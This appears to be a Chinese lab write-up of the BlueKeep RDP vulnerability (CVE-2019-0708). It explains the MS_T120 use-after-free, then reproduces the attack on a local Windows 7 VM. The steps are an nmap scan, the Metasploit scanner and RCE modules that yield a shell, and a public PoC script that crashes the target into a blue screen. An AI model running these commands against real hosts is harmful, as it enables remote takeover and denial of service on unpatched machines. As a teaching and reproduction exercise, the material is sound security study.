CVE-2019-0708(BlueKeep)漏洞分析与复现
文章目錄
- 一、 漏洞簡(jiǎn)介
- 1、漏洞介紹:
- 2、漏洞原理:
- 3、影響版本:
- 二、 漏洞復(fù)現(xiàn)
- 復(fù)現(xiàn)環(huán)境:
- 復(fù)現(xiàn)過(guò)程:
- 1、主機(jī)發(fā)現(xiàn):
- 2、使用MSF的漏洞模塊:
- 3、對(duì)靶機(jī)進(jìn)行漏洞掃描:
- 4、使用攻擊模塊,對(duì)靶機(jī)進(jìn)行攻擊
- 5、使用POC,進(jìn)行藍(lán)屏攻擊
一、 漏洞簡(jiǎn)介
1、漏洞介紹:
2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了 Windows 遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞影響了某些舊版本的 Windows 系統(tǒng)。此漏洞是預(yù)身份驗(yàn)證,無(wú)需用戶交互,這就意味著這個(gè)漏洞可以通過(guò)網(wǎng)絡(luò)蠕蟲(chóng)的方式被利用,與2017年 WannaCry 勒索病毒的傳播方式類似。
2、漏洞原理:
存在漏洞的遠(yuǎn)程桌面服務(wù)器,在接收到特殊數(shù)據(jù)包時(shí)會(huì)釋放一個(gè)內(nèi)部信道 MS_T120 的控制結(jié)構(gòu)體,但并未將指向該結(jié)構(gòu)體的指針刪除,而且在遠(yuǎn)程桌面連接結(jié)束之后還會(huì)調(diào)用 MS_T120 結(jié)構(gòu)體內(nèi)的一個(gè)函數(shù)指針,若攻擊者可通過(guò)遠(yuǎn)程發(fā)送數(shù)據(jù)重新占據(jù)被釋放的 MS_T120,并為結(jié)構(gòu)體內(nèi)的函數(shù)指針賦恰當(dāng)?shù)闹?#xff0c;即可實(shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。
3、影響版本:
目前已知受影響的 Windows 版本包括但不限于:
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
Windows 8 和 windows10 以及之后的版本不受此漏洞影響
二、 漏洞復(fù)現(xiàn)
復(fù)現(xiàn)環(huán)境:
-
攻擊機(jī):Linux kali(IP:192.168.50.130)
-
靶機(jī):Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)
條件:兩臺(tái)機(jī)子可以相互ping通,并且靶機(jī)(無(wú)補(bǔ)丁)開(kāi)啟了3389端口,防火墻是關(guān)閉的!
復(fù)現(xiàn)過(guò)程:
1、主機(jī)發(fā)現(xiàn):
登錄 kali linux,用 nmap 探測(cè)本網(wǎng)段存活主機(jī)
nmap 192.168.50.0/24
可以看到靶機(jī)的3389端口是開(kāi)放的。
2、使用MSF的漏洞模塊:
打開(kāi)MSF:msfconsole
搜索 CVE-2019-0708 漏洞模塊
search cve-2019-0708
得到兩個(gè)模塊,一個(gè)是掃描功能,一個(gè)是攻擊功能。
3、對(duì)靶機(jī)進(jìn)行漏洞掃描:
使用模塊:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep設(shè)置目標(biāo)IP或網(wǎng)段:
set rhosts 192.168.50.132執(zhí)行掃描:run
結(jié)果顯示靶機(jī)存在這個(gè)漏洞。
4、使用攻擊模塊,對(duì)靶機(jī)進(jìn)行攻擊
使用攻擊模塊:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce設(shè)置攻擊目標(biāo)IP
set rhosts 192.168.50.132查看當(dāng)前攻擊配置
show options執(zhí)行攻擊:exploit 或 run
發(fā)現(xiàn)攻擊失敗了,查了一下,知道這里還需要設(shè)置 target 參數(shù),指定靶機(jī)的安裝環(huán)境。這里默認(rèn)是自動(dòng)識(shí)別。
查看 target
1是真實(shí)機(jī)器,這里根據(jù)真實(shí)情況,選擇5
再次執(zhí)行攻擊
攻擊成功!并且得到靶機(jī)的shell。
5、使用POC,進(jìn)行藍(lán)屏攻擊
1、下載poc
git clone https://github.com/n1xbyte/cve-2019-07082、安裝所需要的庫(kù)
kali里默認(rèn)沒(méi)有pip3,先安裝pip3,再安裝impacket庫(kù)
apt-get install python3-pippip3 install impacket3、執(zhí)行POC攻擊
python3 crashpoc.py 192.168.50.132 64 #ip地址 系統(tǒng)版本
成功藍(lán)屏!
總結(jié)
以上是生活随笔為你收集整理的CVE-2019-0708(BlueKeep)漏洞分析与复现的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: MS17-010(永恒之蓝)漏洞分析与复
- 下一篇: /etc/passwd 与 /etc/s